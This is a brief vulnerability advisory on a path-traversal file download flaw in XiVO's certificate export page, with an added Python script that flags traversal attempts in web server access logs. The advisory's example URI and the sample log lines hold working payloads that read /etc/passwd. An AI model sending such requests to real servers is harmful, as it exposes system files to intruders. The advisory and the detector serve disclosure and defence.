XiVO 'id' Parameter Arbitrary File Download Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd
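
Added example (not part of the original advisory): a detector that scans web server access logs for certificate-export requests whose `id` value carries path syntax, as in the URI above. The log lines are constructed, and the rule that a legitimate `id` is a bare name with no separators or `..` segments is an assumption, not something the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter names taken from the advisory's example URI.
EXPORT_PATH = "/manage/certificate/"
# Request line inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=5):
    """Percent-decode several times so nested encodings are normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def is_traversal_id(value):
    """Assumption: a legitimate id is a bare name with no path syntax."""
    v = fully_decode(value).replace("\\", "/")
    return v.startswith("/") or "\x00" in v or ".." in v.split("/")

def suspicious_export_requests(log_lines):
    """Return (line_number, decoded_id) for flagged certificate exports."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if EXPORT_PATH not in fully_decode(url.path):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if "export" not in params.get("act", []):
            continue
        for raw_id in params.get("id", []):
            if is_traversal_id(raw_id):
                hits.append((lineno, fully_decode(raw_id)))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=server-cert HTTP/1.1" 200 1532',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd HTTP/1.1" 200 1204',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1204',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=list HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for lineno, value in suspicious_export_requests(SAMPLE_LOG):
        print(f"line {lineno}: id={value!r}")
```

A 200 response with an unexpected body size on a flagged line is the signal to prioritise when triaging hits.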


 

Copyright 2010, SecurityFocus